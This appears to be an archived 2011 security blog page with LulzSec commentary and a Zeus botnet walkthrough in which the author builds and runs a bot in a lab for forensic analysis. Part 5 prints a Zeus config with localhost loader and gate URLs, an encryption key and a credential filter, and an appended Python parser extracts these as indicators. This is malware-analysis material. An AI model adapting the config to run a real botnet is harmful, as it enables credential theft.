Irregular Expressions

June 26, 2011  1:32 AM

lulz releases

Posted by: Dan O'Connor

In case you ever want them, here are the PB releases for lulzsecurity. This should be everything.

I just don’t have the motivation to download.

June 26, 2011  1:08 AM

Lulz update

Posted by: Dan O'Connor

Looks like they have packed it in; they released a 50th-day anniversary torrent and locked the door on the way out.

Does it mean they are gone?

Who really knows.

I would like to know more why they left.

I hope it's the people that were tracking them down, and maybe one of them got pinched. But I think that is wishful thinking.

I am assuming we will get more details in a few more days, but it may have been a little bit from both sides.

It’s been a crazy 50 days, I have been following lulz since just before the first release, and if anything they did bring out the lulz.

June 25, 2011  12:29 AM

Zeus code walkthrough – Part 8

Posted by: Dan O'Connor
zeus analysis, zeus botnet, zeus source code, zeus walkthrough

The last bit we need before we hit the big red button and infect the machine is getting Wireshark ready to go.

I have Wireshark loaded with a filter string to only capture traffic from the workstation that I will infect.

I have the workstation infected now, and I can see the traffic coming back on port 80 to the web server we set up. The infected workstation is talking to the gate.php file on the web server; as expected, it's encrypted. This will be the first PHP file we dive into, and it should be a great start.

June 24, 2011  12:46 AM


Posted by: Dan O'Connor

Has been in top form the last few posts, start here and work your way back.

I promise I will continue with the Zeus stuff when I get some more sleep.

June 24, 2011  12:44 AM


Posted by: Dan O'Connor

I like the key table at the bottom and how a “slashdotter” would react..

June 24, 2011  12:40 AM

Firesheep in action

Posted by: Dan O'Connor

From CNN of all places…

I wrote about this way back.

June 23, 2011  11:45 PM

What I have been following

Posted by: Dan O'Connor
lulzsecexposed, lulzsecurity, the jester

For the last few weeks I have not been doing a whole bunch. I have really just been following these guys.

You may know who lulzsec is, but the other two might be a stretch if you have not been following that closely.

The Jester (th3j35st3r) is actively hunting lulzsec, his last few blog posts are well worth reading.

lulzsecexposed is also doing the same but has released slightly different information.

June 22, 2011  12:12 AM

Zeus code walkthrough – Part 7

Posted by: Dan O'Connor
zeus analysis, zeus botnet, zeus source code, zeus walkthrough

In case you are following at home, you will need to go download the following:

- Wireshark

- RegShot

Then something to take the disk, process and memory images. I will be using Helix Pro, mainly because I have a copy. There are several other options available to do this.

You can get Helix Pro here.

First order of business is to take a snapshot of the registry with RegShot. Next will be the raw disk image and process / volatile data information using Helix. I have set up a receiving server and will be capturing the disk and memory over the network; then the PDF for the volatile data will be saved.

June 21, 2011  11:55 PM

Zeus code walkthrough – Part 6

Posted by: Dan O'Connor
zeus analysis, zeus botnet, zeus source code, zeus walkthrough

I am just at the point where I am ready to take our bot we built and see if we can get it to run on the target machine.  But I want to make sure we are going to collect every little thing we can.

What we are going to set up is the following.

  1. Capture network traffic with a sniffer. I have Wireshark already on the server, so it will do fine.
  2. Take a registry snapshot of the target machine.
  3. Take a raw disk image of the target machine.
  4. Finally, take process and memory snapshots.

The traffic is encrypted, but capturing it will give a starting point. The registry, raw disk and process snapshots will be compared before and after infection.

June 11, 2011  11:20 PM

Zeus code walkthrough – Part 5

Posted by: Dan O'Connor
zeus analysis, zeus botnet, zeus source code, zeus walkthrough

After building my bot, it's worth looking at what the basic config file looks like.

entry "StaticConfig"
  ;botnet "btn1"
  timer_config 60 1
  timer_logs 1 1
  timer_stats 20 1
  url_config "http://localhost/config.bin"
  remove_certs 1
  disable_tcpserver 0
  encryption_key "secret key"

entry "DynamicConfig"
  url_loader "http://localhost/bot.exe"
  url_server "http://localhost/gate.php"
  file_webinjects "webinjects.txt"
  entry "AdvancedConfigs"
  entry "WebFilters"
  entry "WebDataFilters"
    ;"*" "passw;login"
  entry "WebFakes"
    ;"" "" "GP" "" ""

At this point we know what the encryption key, url_config, url_loader and url_server are. The rest will have to be tracked back in the source code when we get there.

I am very interested in the WebFakes listing.
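As an added example (not the author's code and not anything from the Zeus source), here is a small Python parser for the indentation-nested `entry` format shown above that pulls out the keys the post singles out, which is the first thing an analyst wants from a recovered bot config. The sample config is constructed from the listing above, and `parse_zeus_config`, `extract_indicators` and `c2_hosts` are names introduced here.

```python
import shlex
from urllib.parse import urlparse
# Constructed sample, trimmed from the config listing in the post above.
SAMPLE_CONFIG = '''entry "StaticConfig"
  ;botnet "btn1"
  timer_config 60 1
  url_config "http://localhost/config.bin"
  encryption_key "secret key"

entry "DynamicConfig"
  url_loader "http://localhost/bot.exe"
  url_server "http://localhost/gate.php"
  entry "WebFakes"
    ;"" "" "GP" "" ""
'''

def parse_zeus_config(text):
    """Nested entry blocks -> nested dicts; keys -> list of values; ';' lines skipped."""
    root = {}
    stack = [(-1, root)]  # (indent, block) for each entry block still open
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):  # blank or commented out
            continue
        indent = len(raw) - len(raw.lstrip())
        while indent <= stack[-1][0]:  # close every block this line is not inside
            stack.pop()
        parent = stack[-1][1]
        tokens = shlex.split(line)  # honours the double-quoted values
        if tokens[0] == "entry" and len(tokens) == 2:
            block = {}
            parent[tokens[1]] = block
            stack.append((indent, block))
        else:
            parent[tokens[0]] = tokens[1:]
    return root

def extract_indicators(cfg):
    """Collect the url_* values and the encryption key from any depth of the tree."""
    found = {}
    for key, val in cfg.items():
        if isinstance(val, dict):
            found.update(extract_indicators(val))
        elif key.startswith("url_") or key == "encryption_key":
            found[key] = val[0]
    return found

def c2_hosts(cfg):
    # Hostnames to watch for in the capture, derived from the url_* values.
    return sorted({urlparse(v).hostname for k, v in extract_indicators(cfg).items() if k.startswith("url_")})
```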
